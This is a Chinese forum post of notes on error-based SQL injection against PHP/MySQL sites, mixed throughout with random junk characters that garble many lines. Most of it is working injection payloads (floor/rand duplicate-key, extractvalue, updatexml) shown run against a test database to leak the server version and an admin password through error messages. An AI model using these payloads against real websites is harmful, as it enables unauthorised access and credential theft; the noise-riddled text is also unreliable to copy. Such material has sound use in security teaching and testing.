放点原来的笔记,Mysql在执行语句的时候会抛出异常信息信息,而php+mysql架构的网站往往又将错误代码显示在页面上,这样可以通过构造如下三种方法获取特定数据。
: @5 q, \, E7 ?' Q* L: A实际测试环境:* l8 }/ F, f% [6 _' N3 Y' v
- c! L; x1 v- o# b" F) Y/ h9 @, J& p
8 N6 X# I2 q& d! G
mysql> show tables;
# W5 @8 M9 E) K+ ^3 e6 Y+----------------+* H# V7 O0 }. \2 \
| Tables_in_test |
! L2 p! @7 L) Q& T& N+----------------+
S% p4 c% \2 x! V' M( q' G: V9 o| admin |
) D0 m& X/ s F+ P7 \| article |
! b0 j9 s1 Z+ t' Y: ]# @) Z" l% W+----------------+
; P7 \* f7 C% l+ P! _$ k, C
0 u: E; u" w) z$ V* _3 m ! y- q# H5 J6 L3 @. c. y
/ F+ U6 V3 x3 _% M8 G3 ] ~mysql> describe admin;. x# J4 J( x& q6 R) N9 x
+-------+------------------+------+-----+---------+----------------+0 l3 N: U$ ~ d5 g+ N& k
| Field | Type | Null | Key | Default | Extra |( i$ Q( C( w( o: B
+-------+------------------+------+-----+---------+----------------+
- a- h8 |9 Z' R- t5 @# P. u| id | int(10) unsigned | NO | PRI | NULL | auto_increment |6 q* G5 k% f$ y' V' [2 M) f
| user | varchar(50) | NO | | NULL | |7 \6 n0 Q0 w" j8 D% |' m1 `/ Y
| pass | varchar(50) | NO | | NULL | |
0 H% C3 Z/ v' X5 A) C) j+-------+------------------+------+-----+---------+----------------+
$ m- k# A6 _* l6 F% q5 b6 N 1 r/ _, U+ j- j6 \- Q$ M6 ~) i8 J, @
& W1 I; J( p; }' P# u' o
5 y) s4 h2 e Z5 b6 bmysql> describe article;
4 L( l7 F# N9 q7 g+---------+------------------+------+-----+---------+----------------+
+ T9 a% E/ m, S) t% @. I| Field | Type | Null | Key | Default | Extra |3 [( o) R4 n5 x. |& A
+---------+------------------+------+-----+---------+----------------+2 W- n$ Z! ~3 z8 U% x# ]% @" U
| id | int(10) unsigned | NO | PRI | NULL | auto_increment |
; d6 a7 a1 Q) w/ V| title | varchar(50) | NO | | NULL | |
2 F: m6 H, W+ d) Z| content | varchar(50) | NO | | NULL | |" x" L, Y2 R, Y0 A& J3 u
+---------+------------------+------+-----+---------+----------------+
" F% U! ]: r, U) l/ ?1、通过floor报错
2 y2 U4 X$ F O# `" m6 w可以通过如下一些利用代码2 a3 K, ^+ @1 n( U9 z
; M* Y8 n) ^6 S% o- K
% T [# i4 j/ U; D
and select 1 from (select count(*),concat(version(),floor(rand(0)*2))x
u" Z1 _) A0 a) D9 J( r; L3 gfrom information_schema.tables group by x)a);0 Z5 v. h* S7 q$ R- T3 n
; v: I9 E* I7 L& y+ _7 Q
2 t0 }0 I+ ^, f& c( @6 u8 k2 N: k2 ^' P% oand (select count(*) from (select 1 union select null union select !1)x
5 R) i7 T4 Z7 I2 D. y1 Pgroup by concat((select table_name from information_schema.tables limit 1),8 H" v* l8 [; Q% h6 y# g8 |
floor(rand(0)*2)));) s |6 T' V( o2 D. V
举例如下:
1 w" d) B; h- ?7 D首先进行正常查询:
' d7 @0 J6 `5 ?- y: T$ I- g* A; ~4 ^ + m4 m2 M$ ]# h# C
mysql> select * from article where id = 1;4 k: d" e5 Q* v% Q0 j6 H
+----+-------+---------+8 x. j# D9 [% ^! a3 `
| id | title | content |
' o! w/ D& D* G+ |% f) S5 n' Y, h. ~+----+-------+---------+2 C% `6 O1 [' X' _* h0 A6 I
| 1 | test | do it |
/ ^# |7 `5 }+ h& T. a: j' C+----+-------+---------+
6 U7 Y9 o' r' j! B; _4 ^' U假如id输入存在注入的话,可以通过如下语句进行报错。; C3 g4 m2 L4 ~+ d$ G
x) S2 \) ^* c2 A 5 E8 A7 r- q3 Q' M
mysql> select * from article where id = 1 and (select 1 from. p8 o, ^: u- `" d" [
(select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a);
3 h' G; W/ Y& iERROR 1062 (23000): Duplicate entry '5.1.33-community-log1' for key 'group_key'
+ z) M, z4 Q/ l- K可以看到成功爆出了Mysql的版本,如果需要查询其他数据,可以通过修改version()所在位置语句进行查询。
/ P0 Z" q( d+ [( Q8 z, w5 U例如我们需要查询管理员用户名和密码:9 R, j, E' j& { j; v8 E3 h$ u5 L
Method1:
/ n$ \7 i1 ~! I' P. U . I- [3 B2 Q, A. x* ^! e/ L4 n
, e. n) T5 D5 H$ u' M5 v
mysql> select * from article where id = 1 and (select 1 from4 u' C0 E7 x; M
(select count(*),concat((select pass from admin where id =1),floor(rand(0)*2))x5 C" w( {( Z; s+ e) b6 P
from information_schema.tables group by x)a);
! t8 [' F- t& f3 J# H2 X2 DERROR 1062 (23000): Duplicate entry 'admin8881' for key 'group_key'
! `: E+ q9 D$ k* a9 IMethod2:: n- ]7 y7 l8 ]; X* P# }
2 I" t0 I! q6 U7 \
' X$ Q/ C' y3 \2 T! w# s
mysql> select * from article where id = 1 and (select count(*)
/ }& C3 E# @' t' ]! J" A; p* Qfrom (select 1 union select null union select !1)x group by concat((select pass from admin limit 1),
3 S$ R( S& u/ p) H' b2 B. R- y0 jfloor(rand(0)*2)));
8 L S0 ~* u% FERROR 1062 (23000): Duplicate entry 'admin8881' for key 'group_key'
p8 Y4 e! @# u9 A2、ExtractValue3 U6 K/ N) r* Y3 \ @+ ?
测试语句如下2 p" E) i+ q2 f8 w) K3 ?5 C
9 h4 B( c& m& Z' V $ l0 }) s; }( C- \6 t* }
and extractvalue(1, concat(0x5c, (select table_name from information_schema.tables limit 1)));9 W, m" h) K* a" I1 A7 O
实际测试过程: F* Q3 Z+ C/ [' q& z
3 }1 D) z8 n$ @* b
; F/ r5 [ m: z+ Z& \- M: vmysql> select * from article where id = 1 and extractvalue(1, concat(0x5c,
, f, j5 \$ D! {2 X& D2 ^(select pass from admin limit 1)));--, J: t0 t7 v' [, f
ERROR 1105 (HY000): XPATH syntax error: '\admin888'
, \7 h0 Q; W& C7 s- i% e, w3、UpdateXml. h% `$ U0 G2 n' w( }$ @
测试语句& x1 j* N( L# `0 h
- G6 X! Q6 V0 T* s( d5 H
6 |0 y2 g' t# S2 Nand 1=(updatexml(1,concat(0x5e24,(select user()),0x5e24),1))
4 F, W9 u8 J# w" @ W& t实际测试过程 E T) r6 w$ W& q
- U& b' ]& a! h. [ ?, }: {( F
8 e( ]6 m: U; G/ }9 R: P0 Vmysql> select * from article where id = 1 and 1=(updatexml(1,concat(0x5e24,
) ^9 k! f b: R% e5 V(select pass from admin limit 1),0x5e24),1));6 C' l4 b; t% t( Q2 j
ERROR 1105 (HY000): XPATH syntax error: '^$admin888^$'
, J3 g) [& f+ YAll, thanks foreign guys.
0 ~+ [3 R0 I* }
8 \6 \' V. p' u5 D P j0 q/ l4 x( O. N; o x: Q" A. @4 n
|
发表于 2012-12-10 10:28:51
收藏
支持
反对